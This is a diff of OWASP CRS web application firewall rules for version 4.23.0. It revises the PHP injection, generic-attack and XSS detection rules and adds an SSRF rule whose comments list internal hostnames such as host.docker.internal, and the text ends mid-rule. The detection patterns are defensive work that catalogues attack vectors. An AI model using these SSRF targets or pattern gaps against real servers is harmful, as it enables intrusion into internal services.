"id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -588,7 +649,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X capture,\ t:none,\ msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ - logdata:'Matched Data: %{TX.0} found within %{TX.933151_MATCHED_VAR_NAME}: %{TX.933151_MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -597,10 +658,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ - setvar:'tx.933151_matched_var=%{MATCHED_VAR}',\ - setvar:'tx.933151_matched_var_name=%{MATCHED_VAR_NAME}',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -618,7 +677,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X capture,\ t:none,\ msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ - logdata:'Matched Data: %{TX.0} found within %{TX.933152_MATCHED_VAR_NAME}: %{TX.933152_MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -627,10 +686,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ - setvar:'tx.933152_matched_var=%{MATCHED_VAR}',\ - setvar:'tx.933152_matched_var_name=%{MATCHED_VAR_NAME}',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -648,7 +705,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X capture,\ t:none,\ msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ - logdata:'Matched Data: %{TX.0} found within %{TX.933153_MATCHED_VAR_NAME}: %{TX.933153_MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -657,16 +714,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ - setvar:'tx.933153_matched_var=%{MATCHED_VAR}',\ - setvar:'tx.933153_matched_var_name=%{MATCHED_VAR_NAME}',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # @@ -709,7 +764,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx AUTH_T tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -754,7 +809,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -781,7 +836,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X # # This rule is a stricter sibling of rule 933110. # -SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\..*$" \ +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.ph(?:p\d*|tml|ar|ps|t|pt)\..*$" \ "id:933111,\ phase:2,\ block,\ @@ -797,7 +852,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -827,7 +882,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm ?>" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -863,14 +918,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf index 026b7953e6..b06835d370 100644 --- a/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf +++ b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -67,7 +67,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -103,7 +103,36 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/225/664',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# This rule detects SSRF attempts using hostnames without schemes. +# Some frameworks and libraries add implicit 'http://' or 'https://' schemes +# when processing URLs, making scheme-less hostnames effective attack vectors. +# +# Examples: +# - localhost/ +# - host.docker.internal/ +# - kubernetes.default.svc.cluster.local/ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile ssrf-no-scheme.data" \ + "id:934190,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Server Side Request Forgery (SSRF) Attack: Scheme-less localhost or internal hostname detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/ATTACK-GENERIC',\ + tag:'capec/1000/225/664',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -138,7 +167,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:__p tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1/180/77',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -171,7 +200,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx Proces tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -203,7 +232,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -234,13 +263,13 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -263,7 +292,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -300,7 +329,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 934120 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[0-9]{10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\-\.0-9A-Z_a-z]{1,255}:[0-9]{1,5}(?:#?[\s\x0b]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\-\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\x{e2}(?:\x91[\xa0-\x{bf}]|\x92[\x80-\x{bf}]|\x93[\x80-\x{a9}\x{ab}-\x{bf}])|\x{e3}\x80\x82)+)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip):/?/?(?:[0-9]{7,10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\-\.0-9A-Z_a-z]{1,255}:[0-9]{1,5}(?:#?[\s\x0b]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\-\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\x{e2}(?:\x91[\xa0-\x{bf}]|\x92[\x80-\x{bf}]|\x93[\x80-\x{a9}\x{ab}-\x{bf}])|\x{e3}\x80\x82)+)" \ "id:934120,\ phase:2,\ block,\ @@ -316,7 +345,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/225/664',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -332,7 +361,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 934140 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?:[^@]|@[^\{])*@+\{[^\}]*\}" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx @+\{[\s\x0b]*\[" \ "id:934140,\ phase:2,\ block,\ @@ -349,7 +378,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?:[^ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -377,20 +406,20 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\{% tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf index d8e5ed2a02..187292e2cd 100644 --- a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf +++ b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -63,7 +63,7 @@ SecRule REQUEST_FILENAME "!@validateByteRange 20,45-47,48-57,65-90,95,97-122" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME,\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" # @@ -96,7 +96,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -107,7 +107,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NA # http://xssplayground.net23.net/xssfilter.html # script tag based XSS vectors, e.g., # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS|!REQUEST_HEADERS:Cookie|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ "id:941110,\ phase:2,\ block,\ @@ -124,7 +124,45 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:U tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 2 ]=- +# XSS vectors making use of event handlers like onerror, onload etc, e.g., +# +# We are not listing all the known event handlers like rule 941160, but we +# limit the alerts to keywords of 3-50 characters after the prefix ("on"). +# +# The shortest known event is "onget". The longest known event is "onwebkitplaybacktargetavailabilitychanged" +# with 39 chars after the prefix. 50 chars adds a little bit of safety. +# +# The regex requires the equals sign to be followed by a non-equals character (=[^=]) +# to prevent false positives with base64-encoded strings (which often end in = or ==). +# This improvement allows the rule to be placed at PL1 despite having previously been +# moved to PL2 in v3.4 due to base64-related false positives with the older regex. +# +SecRule 